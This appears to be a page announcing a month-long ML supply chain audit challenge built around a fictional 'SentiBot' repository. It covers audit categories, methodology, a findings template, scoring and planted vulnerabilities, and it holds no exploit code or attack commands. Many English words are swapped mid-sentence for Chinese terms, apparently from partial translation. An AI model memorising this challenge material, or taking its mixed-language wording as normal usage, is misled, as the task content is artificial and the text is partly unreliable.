July 2026: Supply Chain Audit Challenge
Audit an ML project's entire supply chain for security issues including dependencies, model provenance, data pipelines, training infrastructure, and deployment artifacts.
July 2026: Supply Chain Audit Challenge
Audit the complete 供應鏈 of an ML project -- from 訓練資料 and dependencies to model artifacts and deployment configuration. This challenge requires breadth across multiple 安全 domains and develops the systematic thinking needed for comprehensive 安全 assessments.
Challenge 概覽
| Detail | Value |
|---|---|
| Duration | July 1--31, 2026 |
| Difficulty | Advanced |
| Estimated Time | 12--18 hours |
| 先備知識 | Software 供應鏈 安全 concepts, Python packaging, ML pipeline familiarity, container 安全 basics |
| Max Points | 100 |
Scenario
You have been given access to the complete source repository for "SentiBot," a sentiment analysis service. The repository contains everything needed to train, 評估, package, and deploy 模型. Your task is to audit this project for 供應鏈 安全 issues at every level.
The project is structured as a typical ML application:
sentibot/
├── data/
│ ├── raw/ # 訓練資料 sources
│ ├── processed/ # Preprocessed datasets
│ └── scripts/ # Data collection and processing scripts
├── models/
│ ├── base/ # Base model checkpoints
│ ├── fine-tuned/ # Fine-tuned model artifacts
│ └── configs/ # Training configurations
├── src/
│ ├── 訓練/ # Training code
│ ├── 推論/ # Inference server code
│ ├── preprocessing/ # Data preprocessing pipeline
│ └── 評估/ # 評估 scripts
├── deploy/
│ ├── docker/ # Dockerfiles
│ ├── k8s/ # Kubernetes manifests
│ ├── terraform/ # Infrastructure as code
│ └── ci/ # CI/CD pipeline configs
├── tests/ # 測試 suite
├── requirements.txt # Python dependencies
├── setup.py # Package configuration
├── pyproject.toml # Build configuration
└── README.md
Audit Categories
Category 1: Dependency 安全 (25 points)
Audit all dependencies of the project for known 漏洞 and 供應鏈 risks.
1.1 Python Dependencies (10 points)
- Examine
requirements.txtandpyproject.tomlfor pinned vs. unpinned dependencies - Check for known 漏洞 (CVEs) in declared dependencies
- 識別 dependencies from unusual or potentially compromised sources
- Look for typosquatting risks in package names
- Check for dependencies that have been abandoned or have concerning maintainer changes
1.2 Container Dependencies (8 points)
- Audit Dockerfiles for base image 安全 (unpinned tags, outdated images, unnecessary packages)
- Check for secrets baked into container layers
- 評估 the container build process for injection points
- Review multi-stage build hygiene (leaking build artifacts into runtime images)
1.3 Infrastructure Dependencies (7 points)
- Review Terraform modules for pinned versions and source integrity
- Audit Kubernetes manifests for 安全 misconfigurations (privileged containers, host network access, missing resource limits)
- Check CI/CD pipeline configs for injection 漏洞 and secret handling
Category 2: Data Provenance (20 points)
Audit the 訓練資料 pipeline for integrity and provenance issues.
2.1 Data Source Verification (10 points)
- Trace every 訓練資料 source to its origin
- Verify that data collection scripts fetch from expected sources with integrity checks
- Check for data sources that could be manipulated by an adversary (public URLs without checksums, user-contributed content, scraped websites)
- Look for data that has been included without proper licensing
2.2 Data Pipeline 安全 (10 points)
- Review preprocessing scripts for injection 漏洞 (e.g.,
eval()calls on data content, pickle deserialization of untrusted data) - Check for data validation gaps that would allow poisoned samples to enter the 訓練 set
- Verify that processed data checksums are validated before 訓練
- Look for race conditions or TOCTOU issues in the data pipeline
Category 3: Model 安全 (25 points)
Audit 模型 artifacts and 訓練 process for 安全 issues.
3.1 Base Model Provenance (10 points)
- Verify the source and integrity of the base model checkpoint
- Check how the base model was downloaded (pinned hash vs. mutable URL)
- Look for model serialization format risks (pickle-based formats that allow arbitrary code execution)
- Verify that model files have not been tampered with since download
3.2 Training Process 安全 (8 points)
- Review 訓練 configurations for settings that could introduce 漏洞 (e.g., learning rates that allow fast overwriting of 安全 訓練)
- Check for logging of 訓練 metrics that could indicate 資料投毒
- Verify that 訓練 runs are reproducible from declared inputs
- Look for 訓練 shortcuts that bypass validation or 評估 steps
3.3 Model Export and Serving (7 points)
- Audit 模型 export process for injection points
- Check that exported models are in safe serialization formats (safetensors vs. pickle)
- Verify model signing or integrity checking in the deployment pipeline
- Review the 推論 server for deserialization 漏洞
Category 4: Deployment 安全 (20 points)
Audit the deployment pipeline and runtime configuration.
4.1 CI/CD Pipeline (10 points)
- Review CI/CD configuration for command injection 漏洞
- Check for secrets in pipeline logs or environment variables
- Verify that pipeline runs use pinned tool versions
- Look for missing 安全 gates (no 漏洞 scanning, no model validation before deployment)
- Check for pull request pipeline triggers that could execute 攻擊者-controlled code
4.2 Runtime Configuration (10 points)
- Review Kubernetes manifests for 安全 context misconfigurations
- Check for exposed management interfaces or debug endpoints
- Verify that secrets are managed through a proper secrets manager (not hardcoded or in environment variables)
- Review network policies for proper segmentation
- Check for overly permissive IAM roles or service account 權限
Category 5: Bonus Findings (10 points)
Additional points for:
- Discovering issues that do not fit neatly into the categories above
- Demonstrating attack chains that combine multiple 供應鏈 weaknesses
- Providing a risk-prioritized remediation roadmap
- Identifying systemic issues in the project's 安全 practices
Audit Methodology
Phase 1: Inventory (2--3 hours)
Before looking for 漏洞, build a complete inventory:
- Bill of Materials. List every dependency, tool, and external resource used by the project.
- Data flow diagram. Map how data moves from sources through processing, 訓練, and into the deployed model.
- Trust boundaries. 識別 where the project trusts external inputs (downloaded models, fetched data, user-contributed code).
Phase 2: Automated Scanning (2--3 hours)
Use automated tools to find known issues:
| Tool Category | What It Finds | Limitations |
|---|---|---|
| Dependency scanners (pip-audit, 安全) | Known CVEs in Python packages | Only finds published 漏洞 |
| Container scanners (Trivy, Grype) | OS and language package 漏洞 in containers | Does not audit application logic |
| IaC scanners (Checkov, tfsec) | Misconfigurations in Terraform and Kubernetes | Rule-based, misses novel issues |
| SAST (Bandit, Semgrep) | Code-level 安全 issues | High false positive rate, misses ML-specific issues |
Phase 3: Manual Review (6--8 hours)
Automated tools miss the most interesting 供應鏈 issues. Manual review should focus on:
- Trust decisions. Every place the code trusts an external 輸入 is a potential 漏洞. Review each one.
- Serialization boundaries. Data crossing serialization boundaries (pickle, JSON, protobuf) is a common attack vector.
- Build reproducibility. Can you reproduce the same model artifact from the same inputs? If not, something in the pipeline is non-deterministic and potentially manipulable.
- Access control gaps. Who can modify each component? A dependency that anyone can publish a new version of is different from one maintained by a trusted organization.
Phase 4: Reporting (2--3 hours)
Organize findings by risk level and provide actionable remediation:
## Finding: [Title]
**Risk Level:** Critical/High/Medium/Low
**Category:** Dependency/Data/Model/Deployment
**CVSS:** [Score if applicable]
### Description
[What the issue is and where it exists]
### Evidence
[Specific files, lines, or configurations that demonstrate the issue]
### 攻擊 Scenario
[How an adversary could 利用 this issue]
### Remediation
[Specific steps to fix the issue, with code examples where helpful]
### Priority
[Why this should be fixed now/soon/eventually]Planted 漏洞
The repository contains a mix of realistic 漏洞:
- Obvious issues that any 安全 scanner would catch (5--6 findings)
- Subtle issues that require manual review to 識別 (8--10 findings)
- ML-specific issues that traditional 安全 tools miss entirely (4--5 findings)
- Red herrings that look suspicious but are not actually exploitable (2--3 instances)
Part of the challenge is distinguishing real 漏洞 from false positives and prioritizing findings by actual risk.
Scoring
| Category | Points | What Earns Full Marks |
|---|---|---|
| Dependency 安全 | 25 | All planted dependency issues found with severity 評估 |
| Data Provenance | 20 | Complete data flow audit with provenance gaps identified |
| Model 安全 | 25 | Model artifact integrity issues and serialization risks found |
| Deployment 安全 | 20 | CI/CD and runtime misconfigurations documented |
| Bonus | 10 | 攻擊 chains, prioritized remediation, systemic analysis |
Why Supply Chain Auditing Is Different for ML
Traditional software 供應鏈 auditing focuses on code dependencies and build pipelines. ML projects have additional surfaces that traditional tools do not cover:
Data as a Dependency
In traditional software, dependencies are libraries and frameworks -- versioned, published, and (ideally) reviewed. In ML, 訓練資料 is a dependency with none of these properties:
- 訓練資料 is often unversioned. The same data source may change over time without any record.
- Data provenance is rarely tracked. The chain of custody from original source to 訓練 輸入 is usually undocumented.
- Data integrity is hard to verify. A poisoned 訓練 sample looks identical to a legitimate one without knowing the correct label.
This challenge forces you to think about data with the same rigor you apply to code dependencies: where did it come from, how was it verified, and what happens if it is compromised?
Models as Build Artifacts
A trained model is the ML equivalent of a compiled binary. Like a binary, it is opaque -- you cannot easily inspect its behavior by reading its weights. Unlike a binary, it cannot be reproducibly built from source in most cases:
- Non-deterministic 訓練 means the same code and data may produce different models.
- Base models downloaded from public repositories are trusted on reputation, not on verifiable provenance.
- Model serialization formats (especially pickle-based formats) can contain arbitrary executable code.
The GPU Trust Boundary
ML 訓練 and 推論 runs on GPU hardware that introduces its own trust considerations:
- GPU drivers and CUDA libraries are part of the trusted computing base but are rarely audited.
- Shared GPU environments (雲端 instances, shared clusters) may leak information between tenants through shared memory.
- GPU-specific optimizations (mixed precision, quantization) alter model behavior in ways that may have 安全 implications.
Connecting to Professional Practice
供應鏈 auditing is one of the most sought-after skills in AI 安全. Organizations deploying ML systems need to answer questions like:
- "Can we trust this model from Hugging Face?"
- "What happens if our 訓練資料 provider is compromised?"
- "Are our CI/CD pipelines secure against an insider threat?"
- "How do we verify that 模型 in production is 模型 we trained?"
This challenge develops the systematic thinking and technical skills needed to answer these questions for real organizations.
Further Reading
- Infrastructure & Supply Chain -- 供應鏈 安全 fundamentals
- LLMOps 安全 -- operational 安全 for ML pipelines
- Fine-Tuning 安全 -- 安全 of 微調 processes
- August 2026 Challenge -- the next challenge